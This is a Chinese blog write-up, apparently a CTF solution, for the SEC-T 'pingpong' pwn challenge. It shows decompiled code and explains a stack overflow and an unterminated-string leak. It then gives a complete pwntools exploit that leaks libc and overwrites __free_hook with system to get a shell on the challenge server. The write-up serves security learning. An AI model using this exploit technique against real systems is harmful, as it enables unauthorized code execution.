SEC-T pwn题 简单复现

  • pingpong

    这一题应该是最简单的pwn题了 ,但是我还是没做出来。对程序分析的不够明白,虽然把libc和canary都leak出来了,但不知道要怎么做,尝试修改返回地址,但是失败了.......

    防护机制:

    [*] '/home/zs0zrc/game/SECTF/pingppong/pingpong'
        Arch:     amd64-64-little
        RELRO:    Full RELRO
        Stack:    Canary found
        NX:       NX enabled
        PIE:      PIE enabled
    

    防护机制全开,简单的运行了下,程序逻辑很简单。就是输入一串字符串,然后再将转换过后的字符串打印出来。用ida查看反编译的代码

    void __fastcall __noreturn sub_B93(__int64 a1, void *a2)
    {
      signed __int64 v2; // rdx
      void *v3; // rsp
      const char *v4; // [rsp+8h] [rbp-18h]
      void *ptr; // [rsp+10h] [rbp-10h]
      unsigned __int64 v6; // [rsp+18h] [rbp-8h]
    
      v6 = __readfsqword(0x28u);
      v2 = 14LL;
      v3 = alloca(144LL);
      v4 = (16 * ((&v4 + 7) >> 4));                 // overwrite it
      while ( 1 )
      {
        printf("\nping: ", a2, v2);
        ptr = read_content(v4);
        if ( !ptr )
          break;
        a2 = ptr;
        printf("pong: %s\n", ptr);
        free(ptr);
        usleep(0xC350u);
      }
      _exit(0);
    }
    

    程序将v4的地址进行了一些位移操作后传给read_content函数作为参数,调试观察v4经过位移操作后的变化

    操作前:

    &v4 = 0x7fffffffdd78
    *v4 = 0x00007fffffffdeb8
    

    操作后

    &v4 = 0x7fffffffdd78
    *v4 = 0x7fffffffdce0
    

    read_content函数:

    _BYTE *__fastcall read_content(const char *buf)
    {
      int v1; // eax
      char v2; // al
      char v4; // [rsp+17h] [rbp-19h]
      int v5; // [rsp+18h] [rbp-18h]
      int i; // [rsp+18h] [rbp-18h]
      int len; // [rsp+1Ch] [rbp-14h]
      _BYTE *v8; // [rsp+20h] [rbp-10h]
    
      v5 = 0;
      while ( 1 )
      {
        v4 = getchar();                             // stack overflow
        if ( v4 == -1 || v4 == '\n' )
          break;
        v1 = v5++;
        buf[v1] = v4;
      }
      len = strlen(buf);
      v8 = malloc(0x400uLL);
      for ( i = 0; i < len; ++i )
      {
        if ( i & 1 )
          v2 = buf[i] ^ 0x20;
        else
          v2 = buf[i];
        v8[i] = v2;
      }
      return v8;
    }
    

    这里根据将字符串读取到*v4上去,因为这里读取结束的条件是 -1和'\n',可以读取很长的字符串,所以能覆盖v4变量。然后将读取的字符串经过一个简单的异或操作,拷贝到新malloc的chunk中,最后将chunk的地址作为函数返回值。因为这里没有在末尾加'\0'截断字符串,所以存在信息泄露。

    具体思路是:

    泄露libc地址
    覆盖v4的内容为 &__free_hook-8
    然后在读入 '/bin/sh\x00' + p64(system) #将__free_hook覆盖为system地址,这里'/bin/sh\x00'字符串要按它的规则进行异或
    最后程序执行free函数时,就会执行system函数
    #这是其中的一种做法,我看别人的wp还有的是用rop做的,泄露出stack的地址,然后将ropchain写入栈中,再覆盖返回地址
    

exp:

#!/usr/bin/env python
from pwn import *
local = 1

if local:
    p = process('./pingpong')
    elf = ELF('./pingpong')
    libc = elf.libc
else:
    host = '142.93.39.178'
    port = '2025'
    p = remote(host,port)
    elf = ELF('./pingpong')
    libc = ELF('./libc.so.6')

context.arch = elf.arch
context.log_level='debug'

def sd(content):
    p.send(content)

def sl(content):
    p.sendline(content)

def rc():
    return p.recv()

def ru(content):
    return p.recvuntil(content)


rc()
sl('aaaaaaaa')
ru('ping:')
sl('aaaaaaaa')
ru('pong: aAaAaAaA')
leak = u64(p.recvline().strip('\n').ljust(8,'\x00'))
leak_stdout = 0
for i in range(6):
    if(i&1):
        leak_stdout +=(((leak>>i*8)&0xff^0x20)<<(i*8))
    else:
        leak_stdout +=(((leak>>i*8)&0xff)<<(i*8))


libc_base = leak_stdout - libc.symbols['_IO_2_1_stdout_']
__free_hook = libc_base + libc.symbols['__free_hook']
system = libc_base + libc.symbols['system']
print hex(libc_base)

binsh = '/BiN/Sh\x20'
payload1 = 'a'*0x98 + p64(__free_hook-0x8)
payload2 = binsh + p64(system)

sl(payload1)
rc()
sl(payload2)
p.interactive()
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 151,511评论 1 330
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 64,495评论 1 273
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 101,595评论 0 225
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 42,558评论 0 190
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 50,715评论 3 270
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 39,672评论 1 192
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 31,112评论 2 291
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 29,837评论 0 181
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 33,417评论 0 228
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 29,928评论 2 232
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 31,316评论 1 242
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 27,773评论 2 234
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 32,253评论 3 220
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 25,827评论 0 8
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,440评论 0 180
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 34,523评论 2 249
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 34,583评论 2 249

推荐阅读更多精彩内容